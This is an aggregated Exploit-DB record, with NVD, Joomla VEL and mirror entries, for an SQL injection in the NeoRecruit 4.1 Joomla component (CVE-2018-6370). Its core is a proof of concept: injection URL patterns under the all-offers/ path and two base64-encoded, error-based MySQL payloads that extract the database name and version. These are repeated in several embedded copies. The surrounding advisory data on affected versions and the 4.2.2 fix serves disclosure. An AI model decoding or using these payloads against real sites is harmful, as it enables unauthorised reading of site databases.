ID EDB-ID:44123
Type exploitdb
Reporter Exploit-DB
Modified 2018-02-16T00:00:00
Description
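Joomla! Component NeoRecruit 4.1 - SQL Injection (CVE-2018-6370). Webapps exploit for PHP platform. Per the NVD entry, the injection is reachable via the PATH_INFO or the name of a .html file under the all-offers/ URI. The Joomla VEL entry (JVEL:587) lists versions 4.2.1 and previous as affected and gives updating to 4.2.2 as the resolution. Tags: SQL Injection (SQLi)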
# # # #
# Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://neojoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/
# Version: 4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6370
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html
# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]
#
# [first encoded payload string missing from this copy; see the "sourceData" field of the record below]
#
# J2FuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0KHNlbGVjdCBjb25jYXQoY2FzdChkYXRhYmFzZSgpIGFzIGNoYXIpLDB4N2UpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgQU5EICcnPSc=
#
# # # #
{"id": "EDB-ID:44123", "hash": "7009f066f7084f6125762a77e17621da", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla! Component NeoRecruit 4.1 - SQL Injection", "description": "Joomla! Component NeoRecruit 4.1 - SQL Injection. CVE-2018-6370. Webapps exploit for PHP platform. Tags: SQL Injection (SQLi)", "published": "2018-02-16T00:00:00", "modified": "2018-02-16T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://www.exploit-db.com/exploits/44123/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-6370"], "lastseen": "2018-02-16T23:01:41", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-6370"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146453"]}, {"type": "joomla", "idList": ["JVEL:587"]}, {"type": "zdt", "idList": ["1337DAY-ID-29831"]}], "modified": "2018-02-16T23:01:41"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/44123/", "sourceData": "# # # #\r\n# Exploit Title: Joomla! 
Component NeoRecruit 4.1 - SQL Injection\r\n# Dork: N/A\r\n# Date: 16.02.2018\r\n# Vendor Homepage: http://neojoomla.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/\r\n# Version: 4.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6370\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html\r\n# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]\r\n# \r\n# JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM3JTMwJTM0JTMxJTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTQ1JTY2JTY1JTI3JTNkJTI3JTQ1JTY2JTY1\r\n# \r\n# J2FuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0KHNlbGVjdCBjb25jYXQoY2FzdChkYXRhYmFzZSgpIGFzIGNoYXIpLDB4N2UpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgQU5EICcnPSc=\r\n# \r\n# # # #", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-03-06T12:54:35", "bulletinFamily": "NVD", "description": "SQL Injection exists in the NeoRecruit 4.1 component for Joomla! via the (1) PATH_INFO or (2) name of a .html file under the all-offers/ URI.", "modified": "2018-03-05T11:02:13", "published": "2018-02-17T02:29:01", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6370", "id": "CVE-2018-6370", "title": "CVE-2018-6370", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "joomla": [{"lastseen": "2018-09-18T08:40:47", "bulletinFamily": "software", "description": "NeoRecruit by NeoJoomla, versions 4.2.1 and previous, SQL Injection\n\nresolution: update to 4.2.2\n\nupdate notice: http://www.neojoomla.com/index.php?option=com_content&task;=view&id;=275&Itemid;=2\n", "modified": "2018-03-05T23:42:47", "published": "2018-03-05T00:00:00", "id": "JVEL:587", "href": "https://vel.joomla.org/vel-blog/2114", "type": "joomla", "title": "NeoRecruit, 4.2.1, SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-02-17T17:02:52", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-17T00:00:00", "published": "2018-02-17T00:00:00", "href": "https://packetstormsecurity.com/files/146453/Joomla-NeoRecruit-4.1-SQL-Injection.html", "id": "PACKETSTORM:146453", "title": "Joomla! NeoRecruit 4.1 SQL Injection", "type": "packetstorm", "sourceData": "`# # # # \n# Exploit Title: Joomla! 
Component NeoRecruit 4.1 - SQL Injection \n# Dork: N/A \n# Date: 16.02.2018 \n# Vendor Homepage: http://neojoomla.com/ \n# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/ \n# Version: 4.1 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-6370 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html \n# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL] \n# \n# # # # \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/146453/joomlaneorecruit41-sql.txt"}], "zdt": [{"lastseen": "2018-04-02T01:29:25", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-02-17T00:00:00", "published": "2018-02-17T00:00:00", "href": "https://0day.today/exploit/description/29831", "id": "1337DAY-ID-29831", "title": "Joomla NeoRecruit 4.1 Component - SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # #\r\n# Exploit Title: Joomla! 
Component NeoRecruit 4.1 - SQL Injection\r\n# Vendor Homepage: http://neojoomla.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/\r\n# Version: 4.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6370\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html\r\n# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]\r\n# \r\n# JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM3JTMwJTM0JTMxJTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTQ1JTY2JTY1JTI3JTNkJTI3JTQ1JTY2JTY1\r\n# \r\n# J2FuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0KHNlbGVjdCBjb25jYXQoY2FzdChkYXRhYmFzZSgpIGFzIGNoYXIpLDB4N2UpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgQU5EICcnPSc=\r\n# \r\n# # # #\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29831"}]}